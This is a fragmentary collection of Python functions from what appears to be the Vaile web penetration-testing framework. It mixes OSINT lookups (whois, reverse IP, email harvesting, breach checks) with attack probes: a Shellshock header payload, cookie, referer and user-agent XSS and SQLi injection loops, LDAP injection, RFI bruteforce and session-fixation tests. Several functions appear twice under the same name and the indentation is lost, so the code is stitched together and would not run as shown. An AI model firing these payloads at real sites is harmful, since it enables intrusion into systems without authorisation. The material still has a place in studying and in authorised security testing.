def getRes0x00():
requests = session()
email = input(C + ' [§] Enter the email :> ' + R)
if '@' in email and '.' in email:
pass
else:
email = input(C + ' [§] Enter a valid email :> ' + R)
print(GR + ' [*] Setting headers... (behaving as a browser)...')
time.sleep(0.7)
headers = {
'User-Agent':
'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
'Accept-Language': 'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;',
'Connection': 'close'
}
print(P + ' [!] Making the no-verify request...' + C)
time.sleep(0.5)
url = "https://whoisology.com/search_ajax/search?action=email&value=" + email + "&page=1§ion=admin"
result = ''
try:
result = requests.get(url, headers=headers, verify=False,
timeout=10).content
if result != '':
regex = re.compile('whoisology\.com\/(.*?)">')
stuff = regex.findall(result)
if len(stuff) > 0:
for line in stuff:
if line.strip() != '':
if '.' in line:
print(O + ' [+] Received Domain :' + C +
color.TR3 + C + G + line + C + color.TR2 + C)
else:
print(R + " [-] Empty domain result for email : " + O + email +
C)
except:
print(R + " [-] Can't reach url...")
print(R + ' [-] Request timed out!')
def apachestat(web):
name = targetname(web)
requests = session()
lvl2 = "apachestat"
module = "ReconANDOSINT"
lvl1 = "Active Reconnaissance"
lvl3 = ""
flag = 0x00
time.sleep(0.7)
#print(R+'\n ===========================')
#print(R+' A P A C H E S T A T U S ')
#print(R+' ===========================\n')
from core.methods.print import posintact
posintact("apache status")
print(C + ' [*] Importing fuzz parameters...')
time.sleep(0.7)
print(GR + ' [*] Initializing bruteforce...')
with open('files/fuzz-db/apachestat_paths.lst', 'r') as paths:
for path in paths:
path = path.replace('\n', '')
url = web + path
print(B + ' [+] Trying : ' + C + url)
resp = requests.get(url,
allow_redirects=False,
verify=False,
timeout=7)
if resp.status_code == 200 or resp.status_code == 302:
print(O + ' [+] Apache Server Status Enabled at :' + C +
color.TR3 + C + G + url + C + color.TR2 + C)
flag = 0x01
save_data(database, module, lvl1, lvl2, lvl3, name, url)
if flag == 0x00:
save_data(database, module, lvl1, lvl2, lvl3, name,
"No server status enabled.")
print(R + ' [-] No server status enabled!')
print(C + ' [+] Apache server status completed!\n')
def subnet(web):
name = targetname(web)
module = "ReconANDOSINT"
lvl1 = "Passive Reconnaissance & OSINT"
lvl3 = ''
lvl2 = inspect.stack()[0][3]
requests = session()
web = web.replace('http://', '')
web = web.replace('https://', '')
if "@" in web:
web = web.split("@")[1]
time.sleep(0.4)
#print(R+'\n ====================================')
#print(R+' S U B N E T E N U M E R A T I O N')
#print(R+' ====================================\n')
from core.methods.print import posintpas
posintpas("subnet enumeration")
print(GR + ' [!] Enumerating subnets in network...')
time.sleep(0.4)
print(GR + ' [*] Getting subnet class infos...\n')
domains = [web]
for dom in domains:
text = requests.get('http://api.hackertarget.com/subnetcalc/?q=' +
dom).text
#text = requests.get('https://steakovercooked.com/api/ping/?host=' + dom).text
http = str(text)
if 'error' not in http:
result = http.splitlines()
for r in result:
print(O + ' ' + r.split('=')[0] + C + color.TR3 + C + G + '=' +
r.split('=')[1] + C + color.TR2 + C)
save_data(database, module, lvl1, lvl2, lvl3, name, http)
elif 'No results found' in http:
print(R + ' [-] No results found!')
save_data(database, module, lvl1, lvl2, lvl3, name,
"No results found.")
else:
print(R + ' [-] Outbound Query Exception!')
def outer(web):
requests = session()
global final
final = []
wew = []
time.sleep(0.4)
print(R + '\n A P I R E T R I E V E R ')
print(R + ' ---<>----<>----<---<>----<>')
print(GR + color.BOLD + ' [!] Retriving subdomains...')
time.sleep(0.4)
print("" + GR + color.BOLD + " [~] Result: " + color.END)
dom = 'http://' + web
text = requests.get('http://api.hackertarget.com/hostsearch/?q=' +
dom).text
result = str(text)
if 'error' not in result:
print(color.END + result + C)
mopo = result.splitlines()
for mo in mopo:
ro = mo.split(',')[0]
final.append(str(ro))
def xsscookie0x00(web, parallel):
#print(R+'\n =======================')
print(R + '\n X S S (Cookie Based)')
print(R + ' ——·‹›·––·‹›·——·‹›·——·‹›\n')
sleep(0.5)
vsession = session()
vsession.get(web)
if vsession.cookies:
print(G + ' [+] This website supports session cookies...')
success = []
if not parallel:
success += cookieatck(pay, vsession, web)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(cookieatck, args=(
l,
vsession,
web,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
print(
" [+] XSS (Cookie) Vulnerability found! Successful payloads:"
)
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
else:
print(R + ' [-] No support for cookies...')
time.sleep(0.5)
print(R + ' [-] Cookie based injection not possible...')
def shellshock0x00(web):
requests = session()
print(GR + ' [*] Parsing strings...')
time.sleep(0.5)
r_str = ''.join(Random().sample(string.ascii_letters, 30))
print(GR + ' [*] Configuring payloads...')
con = '() { :;}; echo; echo; echo %s' % (r_str)
cmd = "() { test;};/bin/nopatchobfu"
headers = {'User-agent': cmd}
time.sleep(0.5)
print(O + ' [*] Making no-verify request...')
time.sleep(1)
r = requests.get(web, headers=headers, verify=False)
if r.status_code == 500 or r.status_code == 502:
print(G + ' [+] The website seems Vulnerable to Shellshock...')
time.sleep(0.5)
print(O + ' [*] Confirming the vulnerability...')
headers = {'User-Agent': con, 'Cookie': con, 'Referer': con}
resp = requests.get(web, headers=headers, verify=False)
if resp.status_code == 200:
if re.search(r_str, resp.content, re.I):
print(G + ' [+] ShellShock was found in: {}'.format(resp.url))
data = 'ShellShock was found in: {}'.format(resp.url)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
elif r.status_code:
print(
R +
' [-] 2nd phase of detection does not reveal vulnerability...')
print(O + ' [!] Please check manually...')
save_data(
database, module, lvl1, lvl2, lvl3, name,
"2nd phase of detection does not reveal vulnerability. Please check manually."
)
else:
print(R + ' [-] The website seems immune to shellshock...')
save_data(database, module, lvl1, lvl2, lvl3, name, "Not vulnerable.")
def apircv(web):
requests = session()
try:
domain = web.replace('http://','')
domain = web.replace('https://','')
html = requests.get('http://w3techs.com/siteinfo.html?fx=y&url=' + domain).text
soup = BeautifulSoup(html, 'lxml')
table = soup.findAll('table', attrs={'class':'w3t_t'})[0]
trs = table.findAll('tr')
for tr in trs:
th = tr.find('th')
td = tr.find('td').text
if td[-7:] == 'more...':
td = td[:-9]
print(G+' [+] '+th.text+': ')
print(C+' '+td+'\n')
time.sleep(0.7)
except:
print(R+' [-] Outbound Query Exception!')
def getRes0x00():
requests = session()
email = input(O+' [#] Enter the email :> '+R)
if '@' in email and '.' in email:
pass
else:
email = input(O+' [#] Enter a valid email :> '+R)
print(GR+' [*] Setting headers... (behaving as a browser)...')
time.sleep(0.7)
headers = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
'Accept-Language':'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;',
'Connection':'close'}
print(O+' [!] Making the no-verify request...')
time.sleep(0.5)
url = 'https://hacked-emails.com/api?q='+str(email)
try:
req = requests.get(url, headers=headers, timeout=10, verify=False)
content = req.text
if content != "":
content = json.loads(content)
if content['status'] == "found":
print("Result found ("+G+str(content['results']) + " results" + Style.RESET_ALL + ")")
for line in content['data']:
try:
print(G+" [+] "+O+email+G+" found in : " +C+ str(line['title']) +R+" (" + str(line['date_leaked'])+')')
except:
print(R+" [-] Can't parse the leak titles via APi...")
else:
print(R+' [-] Email '+O+email+R+' not found in any breaches!')
else:
print(R+' [-] Error found in Json Request...')
except Exception:
print(R+" [-] Can't reach url...")
print(R+' [-] Request timed out!')
def request(url, lvl2):
name = targetname(url)
requests = session()
time.sleep(0.5)
links = [url]
po = url.split('//')[1]
for w in links:
print(GR+' [*] Scraping Page: '+O+url+C)
req = requests.get(w).text
check0x00(req, url, lvl2, name)
soup = BeautifulSoup(req,'lxml')
for line in soup.find_all('a', href=True):
newline = line['href']
try:
if newline[:4] == "http":
if po in newline:
urls.append(str(newline))
elif newline[:1] == "/":
combline = url+newline
urls.append(str(combline))
except Exception:
print(R+' [-] Unhandled Exception Occured!')
try:
for uurl in urls:
print("\n"+O+" [+] Scraping Page: "+C+color.TR3+C+G+uurl+C+color.TR2+C)
req = requests.get(uurl).text
check0x00(req, url, lvl2, name)
except Exception:
print(R+' [-] Outbound Query Exception...')
if found == 0x00:
print(R+'\n [-] No Errors found in Source Code!\n')
save_data(database, module, lvl1, lvl2, lvl3, name, "No Errors found in Source Code.")
print(G+' [+] Scraping Done!'+C+color.TR2+C)
def getemails0x00(domain):
requests = session()
global flag
flag = False
page_counter = 0
try:
while page_counter < 100 :
print(GR+' [*] Setting parameters...')
time.sleep(0.6)
results = 'http://www.google.com/search?q='+str(domain)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
print(O+' [!] Making the request...')
response = requests.get(results)
print(GR+' [*] Extracting reponse...')
text = response.text
emails = re.findall('([\w\.\-]+@'+domain+')',tagparse(text))
for email in emails:
print(G+' [+] Received e-mail : '+O+email)
flag = True
page_counter = page_counter + 10
except IOError:
print(R+" [-] Error connecting to Google Groups...")
try:
while page_counter < 100 :
print(GR+' [*] Setting parameters...')
time.sleep(0.6)
results = 'http://groups.google.com/groups?q='+str(domain)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
print(O+' [!] Making the request...')
response = requests.get(results)
print(GR+' [*] Extracting reponse...')
text = response.text
emails = re.findall('([\w\.\-]+@'+domain+')',tagparse(text))
for email in emails:
print(G+' [+] Received e-mail : '+O+email)
flag = True
page_counter = page_counter + 10
except IOError:
print(R+" [-] Error connecting to Google Groups...")
def sessionfix(url):
requests = session()
#print(R+'\n =================================')
#print(R+'\n S E S S I O N F I X A T I O N')
#print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·––·‹›·——·\n')
from core.methods.print import pvln
pvln("session fixation")
print(GR+' [*] Making the request...')
if properties["COOKIE"][1] == " ":
coo = input(O+' [§] Got any cookies? [Just Enter if None] :> ')
elif properties["COOKIE"][1].lower() == "none":
coo = ""
else:
coo = properties["COOKIE"][1]
if coo is not "":
req = requests.get(url, cookies=coo, verify=True, timeout=7)
else:
req = requests.get(url, verify=True, timeout=7)
if req.cookies:
print(G+' [+] Found cookie reflecting in headers...')
print(B+' [+] Initial cookie state: '+C, req.cookies, '\n')
user = input(O+' [§] Enter authentication username :> '+C)
upass = input(O+' [§] Enter password :> '+C)
print(GR+' [*] Trying POST request with authentication...')
cookie_req = requests.post(url, cookies=req.cookies, auth=(user, upass), timeout=7)
print(B+' [+] Authenticated cookie state:'+C, cookie_req.cookies)
if req.cookies == cookie_req.cookies:
print(G+' [+] Site seems to be vulnerable...')
print(G+' [+] Site is vulnerable to session fixation vulnerability!')
else:
print(O+' [!] Cookie values do not match...')
print(R+' [-] Target not vulnerable to session fixation!')
else:
print(R+' [-] No basic cookie support!')
print(R+' [-] Target not vulnerable to session fixation!')
print(G+' [+] Session Fixation Module Completed!\n')
def revdns(web):
name = targetname(web)
module = "ReconANDOSINT"
lvl1 = "Passive Reconnaissance & OSINT"
lvl3 = ''
lvl2 = inspect.stack()[0][3]
requests = session()
web = web.split('//')[1]
if "@" in web:
web = web.split("@")[1]
#print(R+'\n =====================================')
#print(R+' R E V E R S E D N S L O O K U P')
#print(R+' =====================================\n')
from core.methods.print import posintpas
posintpas("reverse dns lookup")
time.sleep(0.4)
print('' + GR + color.BOLD + ' [!] Looking Up for Reverse DNS Info...')
time.sleep(0.4)
print("" + GR + color.BOLD + " [~] Result: \n" + color.END)
text = requests.get('http://api.hackertarget.com/reversedns/?q=' + web)
result = text.text
if 'error' not in result and 'no result' not in result.lower():
res = result.splitlines()
for r in res:
print(r)
print(O + ' [+] Received :' + C + color.TR3 + C + G +
r.split(',')[0].strip() + ' => ' + C + '(' +
r.split(',')[1].strip() + ')' + C + color.TR2 + C)
time.sleep(0.04)
links.append(r)
data = result
save_data(database, module, lvl1, lvl2, lvl3, name, data)
else:
print(R + ' [-] No result found!')
save_data(database, module, lvl1, lvl2, lvl3, name, "No result found.")
time.sleep(0.8)
def check0x00(url, pays, check):
#vuln = 0
success = []
requests = session()
for params in url.split("?")[1].split("&"):
for payload in pays:
vuln = False
print(B+'\n [*] Trying payload :> '+C+str(payload))
print(GR+' [!] Setting parameter value...')
bugs = url.replace(params, params + str(payload).strip())
print(O+' [*] Making the request...')
#request = useragent.open(bugs)
request = requests.get(bugs)
print(GR+' [*] Reading response...')
html = request.content
checker = re.findall(check, str(html))
if (len(checker) != 0):
vuln = True
else:
vuln = False
if vuln == True:
print(G+" [+] Possible vulnerability found!")
print(C+" [+] Payload: ", payload)
print(R+" [+] Example PoC: " + bugs)
#vuln = vuln + 1
success.append(bugs)
else:
print(R+' [-] No command injection flaw detected!')
print(O+' [-] Payload '+R+payload+O+' not working!')
#if (vuln == 0):
# print(G+"\n [+] This website is damn secure. No vulnerabilities found. :)\n")
#else:
# print("\n [+] "+str(vuln)+" Bugs Found. Happy Hunting... :) \n")
return success
def userpre(pay, web):
success = []
requests = session()
for i in pay:
print(B + ' [*] Using payload : ' + C + i)
time.sleep(0.7)
user_agent = {
'User-agent':
'Mozilla/5.0 (X11; Ubuntu; Linux' +
'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
}
user_agent['User-agent'] += i
req = requests.get(web, headers=user_agent)
print(O + ' [*] Using ' + R + '!nfected' + O + ' UA : ' + GR +
user_agent['User-agent'])
#flag = u' '.join(req.text).encode('utf-8').strip()
flag = " ".join(req.text).strip()
if 'error' in flag or 'syntax' in flag or 'MySQL'.lower(
) in flag.lower():
print(G + '\n [!] Error based SQLi (User-Agent Based) Detected!')
print(R + ' [!] User-Agent : ' + O + user_agent['User-agent'])
success.append(i)
return success
def refatck(pays, web):
success = []
requests = session()
for j in pays:
i = '%s' % j
print(B+' [*] Using payload : '+C+i)
time.sleep(0.7)
user_agent = {'Referer': 'http://' + 'xssing.pwn'}
user_agent['Referer'] += i
req = requests.get(web, headers=user_agent)
print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['Referer'])
#flag = ' '.join(k for k in req.text).encode('utf-8').strip()
flag = req.text.encode("utf-8").strip()
if str(i) in str(flag):
#print("1")
print(G+'\n [!] Cross Site Scripting (Referrer Based) Detected!')
#print("2")
print(R+' [!] User-Agent : '+O+user_agent['Referer'])
print(W+color.BOLD+' [+] Code: '+W)
#print("3")
print(str(req.content)+'\n')
success.append(i)
return success
def blocklistssh(web, ip):
requests = session()
print(O + '\n [!] Checking on ' + G + 'BlockLists SSH threatlist...')
try:
flag = False
print(GR + ' [*] Making the request...')
resp = requests.get('https://lists.blocklist.de/lists/ssh.txt',
verify=False,
timeout=10).text
print(C + ' [!] Parsing raw data...')
time.sleep(0.5)
for i in resp.splitlines():
if ip in i:
flag = True
if flag == True:
print(R + ' [+] ' + O + web + G +
' has been reported for attacks on SSH services...')
else:
print(G + ' [+] ' + O + web + G + ' is clean as per BlockLists...')
except:
print(R + ' [-] Request to BlockLists timed out!')
pass
def usom(web, ip):
requests = session()
print(O + '\n [!] Checking on ' + G + 'Usom threatlist...')
try:
print(GR + ' [*] Making a reverse DNS query...')
print(G + ' [+] DNS : ' + O + ip)
flag = False
print(GR + ' [*] Making the request...')
resp = requests.get('https://www.usom.gov.tr/url-list.txt',
verify=False,
timeout=10).content
for i in str(resp).splitlines():
if ip in i:
flag = True
if flag == True:
print(R + ' [+] ' + O + web + G +
' is harmful and has been reported on Usom...')
else:
print(G + ' [+] ' + O + web + G + ' is clean as per Usom...')
except:
print(R + ' [-] Request to usom.gov.tr timed out!')
pass
def piwebenum(web):
requests = session()
time.sleep(0.4)
web = web.split('//')[1]
#print(R+'\n =============================================')
#print(R+' P I N G / N P I N G E N U M E R A T I O N')
#print(R+' =============================================\n')
from core.methods.print import posintact
posintact("(n)ping enumeration")
print(GR + ' [!] Pinging website...')
time.sleep(0.5)
print(O + ' [*] Using adaptative ping and debug mode with count 5...')
time.sleep(0.4)
print(GR + ' [!] Press Ctrl+C to stop\n' + C)
os.system('ping -D -c 5 ' + web)
print('')
time.sleep(0.6)
print(O + ' [*] Trying NPing (NMap Ping)...')
print(C + " [~] Result: \n")
print('')
text = requests.get('http://api.hackertarget.com/nping/?q=' + web).text
nping = str(text)
print(G + nping + '\n')
def credit0x00(url):
requests = session()
print(G+' [+] Importing credit card signatures...')
time.sleep(0.5)
links = [url]
po = url.split('//')[1]
for w in links:
print(GR+' [*] Scraping Page: '+O+url)
req = requests.get(w).text
check0x00(req)
soup = BeautifulSoup(req,'lxml')
for line in soup.find_all('a', href=True):
newline = line['href']
try:
if newline[:4] == "http":
if po in newline:
urls.append(str(newline))
elif newline[:1] == "/":
combline = url+newline
urls.append(str(combline))
except:
print(R+' [-] Unhandled Exception Occured!')
try:
for uurl in urls:
print(G+"\n [+] Scraping Page: "+O+uurl)
req = requests.get(uurl).text
check0x00(req)
except:
print(R+' [-] Outbound Query Exception...')
if found == 0x00:
print(R+' [-] No Credit Cards found disclosed in plaintext in source code!')
print(G+' [+] Scraping Done!')
def getgeoip(web):
name = targetname(web)
requests = session()
web = web.replace('http://', '')
web = web.replace('https://', '')
if "@" in web:
web = web.split("@")[1]
#print(R+'\n =========================')
#print(R+' G E O I P L O O K U P')
#print(R+' =========================\n')
from core.methods.print import posintpas
posintpas("geoip lookup")
time.sleep(0.4)
print(GR + ' [!] Looking Up for WhoIS Information...')
time.sleep(0.4)
print(GR + " [~] Found GeoIp Location: \n")
domains = socket.gethostbyname(web)
time.sleep(0.6)
text = requests.get('http://api.hackertarget.com/geoip/?q=' + domains).text
result = str(text)
if 'error' not in result and 'invalid' not in result:
res = result.splitlines()
for r in res:
print(O + ' [+] ' + r.split(':')[0].strip() + '' + C + color.TR3 +
C + G + r.split(':')[1].strip() + C + color.TR2 + C)
time.sleep(0.1)
else:
print(R + ' [-] Outbound Query Exception!')
time.sleep(0.8)
module = "ReconANDOSINT"
lvl1 = "Passive Reconnaissance & OSINT"
lvl2 = inspect.stack()[0][3]
lvl3 = ""
data = result
save_data(database, module, lvl1, lvl2, lvl3, name, data)
def revip(web):
name = targetname(web)
module = "ReconANDOSINT"
lvl1 = "Passive Reconnaissance & OSINT"
lvl3 = ''
lvl2 = inspect.stack()[0][3]
requests = session()
web = web.replace('http://', '')
web = web.replace('https://', '')
if "@" in web:
web = web.split("@")[1]
#print(R+'\n ===================================')
#print(R+' R E V E R S E I P L O O K U P')
#print(R+' ===================================\n')
from core.methods.print import posintpas
posintpas("reverse ip lookup")
time.sleep(0.4)
print('' + GR + color.BOLD + ' [!] Looking Up for Reverse IP Info...')
time.sleep(0.4)
print("" + GR + color.BOLD + " [~] Result : \n" + color.END)
domains = [web]
for dom in domains:
text = requests.get('http://api.hackertarget.com/reverseiplookup/?q=' +
dom).text
result = str(text)
res = result.splitlines()
if 'error' not in result:
for r in res:
print(O + ' [+] Site :>' + C + color.TR3 + C + G + r + C +
color.TR2 + C)
links.append(r)
time.sleep(0.04)
save_data(database, module, lvl1, lvl2, lvl3, name, result)
elif 'error' in result:
print(R + ' [-] Outbound Query Exception!')
time.sleep(0.8)
def check0x00(alias, web):
requests = session()
print(GR + " [*] Searching alias " + O + alias + GR +
" on 160 websites...\n")
print(GR + ' [¬] Result : \n')
headers = {'X-Requested-With': 'XMLHttpRequest'}
for service in services:
try:
url = 'http://checkusernames.com/usercheckv2.php?target=' + service + '&username='******'notavailable' in req.text:
#if req.content.split('|')[0] == '2': #found
print(GR + ' [+] Found ' + O + alias + G + ' : ' + C + service)
serv.append(service)
except Exception as e:
print(R + ' [-] Incurred Exception : ' + str(e))
if 'http://' in web.strip():
po = web.replace('http://', '')
elif 'https://' in web.strip():
po = web.replace('https://', '')
if "@" in po:
po = po.split("@")[1]
p = 'tmp/logs/' + po + '-logs/' + str(po) + '-usernames.lst'
open(p, 'w+')
print(B + ' [!] Saving links...')
time.sleep(1)
for m in serv:
m = 'Social Network : ' + m + '\n'
ile = open(p, "a")
ile.write(m)
ile.close()
pa = os.getcwd()
print(G + ' [+] Links saved under ' + pa + '/' + p + '!')
print('')
def check0x00(web000, headers, pays):
success = []
requests = session()
for payload in pays:
gotcha = False
print(B + '\n [+] Using Payload : ' + C + payload)
web0x00 = web000 + payload
print(O + ' [+] Url : ' + C + web0x00)
print(GR + ' [*] Making the request...')
try:
req = requests.get(web0x00,
headers=headers,
allow_redirects=False,
timeout=7,
verify=False).text
print(O + ' [!] Searching through error database...')
for err in ldap_errors:
if err.lower() in req.lower():
print(G + ' [+] Possible LDAP Injection Found : ' + O +
web0x00)
gotcha = True
print(O + ' [+] Response : ')
print(P + req)
success.append(payload)
else:
pass
if gotcha == False:
print(R + ' [-] No error reflection found in response!')
time.sleep(0.4)
print(R + ' [-] Payload ' + O + payload + R + ' not working!')
pass
except Exception as e:
print(R + ' [-] Query Exception : ' + str(e))
return success
def iphistory(web):
requests = session()
try:
#print(R+'\n =====================')
#print(R+' I P H I S T O R Y')
#print(R+' =====================\n')
from core.methods.print import posintpas
posintpas("ip history")
print(GR+' [*] Parsing Url...')
web0 = web.split('//')[-1]
if "@" in web0:
web0 = web0.split("@")[1]
print(web0)
print(O+' [!] Making the request...')
html = requests.get('http://viewdns.info/iphistory/?domain=' + web0).text
print(GR+' [*] Parsing raw-data...')
time.sleep(0.7)
soup = BeautifulSoup(html,'lxml')
print(O+' [!] Setting parameters...')
table = soup.findAll('table', attrs={'border':'1'})[0]
print(C+' [!] Finding IP history instances...')
trs = table.findAll('tr')
trs.pop(0)
print(G+'\n [+] Following instances were found...')
for tr in trs:
td = tr.findAll('td')
info = {'ip' : td[0].text, 'owner' : td[2].text.rstrip(), 'last' : td[3].text}
print(G+' [+] Instance : ' +C+ info['ip'] +GR+ ' => ' + info['owner'] +B+ ' - (' + info['last'] + ')')
time.sleep(0.02)
except:
print(R+' [-] No instances of IP History found...')
def projecthoneypot(web, ip):
requests = session()
print(O + '\n [!] Checking on ' + G + 'Project HoneyPot threatlist...')
try:
flag = False
print(GR + ' [*] Making the request...')
resp = requests.get('https://www.projecthoneypot.org/list_of_ips.php',
verify=False,
timeout=10).text
if str(ip) in resp:
flag = True
if flag == True:
print(
R + ' [+] ' + O + web + G +
' is a harmful site and has been reported on Project HoneyPot...'
)
else:
print(G + ' [+] ' + O + web + G +
' is clean as per Project HoneyPot...')
except:
print(R + ' [-] Request to projecthoneypot.com timed out!')
pass
def check0x00(web, dirpath, headers):
requests = session()
try:
for dirs in dirpath:
web0x00 = web + dirs
req = requests.get(web0x00,
headers=headers,
allow_redirects=False,
timeout=7,
verify=False)
try:
if (req.headers['content-length'] is not None):
size = int(req.headers['content-length'])
else:
size = 0
except (KeyError, ValueError, TypeError):
size = len(req.content)
finally:
size = FileUtils.sizeHuman(size)
resp = str(req.status_code)
if (resp == '200' or resp == '302' or resp == '304'):
print(G + ' [*] Found : ' + O + web0x00 + GR + ' - ' + size +
G + ' (' + resp + ')')
file_paths.append(web0x00)
else:
print(C + ' [*] Checking : ' + B + web0x00 + R + ' (' + resp +
')')
return file_paths
except Exception as e:
print(R + ' [-] Unknown Exception Encountered!')
print(R + ' [-] Exception : ' + str(e))
return file_paths
def brute0x00(web):
requests = session()
try:
print(GR+' [*] Importing wordlist...')
if os.path.exists('files/fuzz-db/rfi_paths.lst') == True:
print(G+' [+] File path found!')
time.sleep(0.6)
print(O+' [*] Importing wordlist...')
with open('files/fuzz-db/rfi_paths.lst','r') as wew:
for w in wew:
w = w.strip('\n')
payloads.append(w)
print(GR+' [*] Starting bruteforce...')
time.sleep(0.7)
for pay in payloads:
try:
pay = pay.replace('XXpathXX',payload_url)
web0x00 = web + pay
req = requests.get(web0x00, allow_redirects=False, timeout=7, verify = False)
c = str(req.status_code)
if c == '200' and payload_1 in req.text and payload_2 in req.text and payload_3 in req.text:
print(G+' [+] Possible RFi at : '+O+web0x00+G+' (200)')
elif c == '404':
print(B+' [*] Checking dir : '+C+web0x00+R+' (404)')
elif c == '302':
print(B+' [*] Possible RFi : '+C+web0x00+GR+' (302)')
else:
print(O+' [*] Interesting response : '+GR+web0x00+O+' ('+c+')')
except:
print(R+' [-] Exception Encountered!')
pass
except Exception as e:
print(R+' [-] Unexpected Exception Encountered!')
print(R+' [-] Exception : '+str(e))
def sqliuser0x00(web, parallel):
#print(R+'\n =============================')
print(R+'\n S Q L i (User-Agent Based)')
print(R+' ––·‹›·––·‹›·––·‹›·––·‹›·––·‹›\n')
success = []
requests = session()
if not parallel:
for i in pay:
print(B+' [*] Using payload : '+C+i)
time.sleep(0.7)
user_agent = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux' +
'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'}
user_agent['User-agent'] += i
req = requests.get(web, headers=user_agent)
print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['User-agent'])
#flag = u' '.join(req.text).encode('utf-8').strip()
flag = " ".join(req.text).strip()
if 'error' in flag or 'syntax' in flag or 'MySQL'.lower() in flag.lower():
print(G+'\n [!] Error based SQLi (User-Agent Based) Detected!')
print(R+' [!] User-Agent : '+O+user_agent['User-agent'])
success.append(i)
else:
paylists = listsplit(pay, round(len(pay)/processes))
with Pool(processes=processes) as pool:
res = [pool.apply_async(userpre, args=(l,web,)) for l in paylists]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
success += j
if success:
print(" [+] SQLi Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded."+C)
def do_fetch(self, inp, gui=False):
try:
localver = varis.e_version.split("#")[0]
s = session()
onver = s.get("https://raw.githubusercontent.com/VainlyStrain/Vaile/master/core/doc/version").text.strip()
localmain = localver.split("-")[0]
localrev = localver.split("-")[1]
locallist = localmain.split(".")
onmain = onver.split("-")[0]
onrev = onver.split("-")[1]
onlist = onmain.split(".")
uptodate = True
for i in range(0, len(locallist)):
if int(locallist[i]) < int(onlist[i]):
uptodate = False
if uptodate:
if int(localrev) < int(onrev):
uptodate = False
if not uptodate:
print(" [!] An update is available! Last version is: {}, installed version is: {}.".format(onver, localver))
if not gui:
d = input(" [?] Do you want to update the framework? (enter if not) :> ")
if d is not "":
path = os.path.dirname(os.path.realpath(__file__))
if "/home/" in path:
user = path.split("/")[2]
os.system("sudo -u {} git pull".format(user))
else:
os.system("git pull ; cp tmp/Vaile /bin/Vaile ; chmod +x /bin/Vaile")
print(G+" [+] Update installed successfully."+C+color.TR2+C)
else:
print(" [+] You are running the latest version of Vaile-framework ({}).".format(localver))
if gui:
return (uptodate, onver)
except:
print(R + " [-] " + "\033[0m" + color.UNDERLINE + "\033[1m" + "An error occurred fetching...")
def whoischeckup(web):
requests = session()
web = web.replace('http://', '')
web = web.replace('https://', '')
if "@" in web:
web = web.split("@")[1]
#print(R+'\n =========================')
#print(R+' W H O I S L O O K U P')
#print(R+' =========================\n')
from core.methods.print import posintpas
posintpas("whois lookup")
time.sleep(0.4)
print('' + GR + color.BOLD + ' [!] Looking Up for WhoIS Information...')
time.sleep(0.4)
print("" + GR + color.BOLD + " [~] Result: \n" + color.END)
domains = [web]
for dom in domains:
text = requests.get('http://api.hackertarget.com/whois/?q=' + dom).text
nping = str(text)
if 'error' not in nping:
print(color.END + nping + C)
else:
print(R + ' [-] Outbound Query Exception!')
time.sleep(0.8)
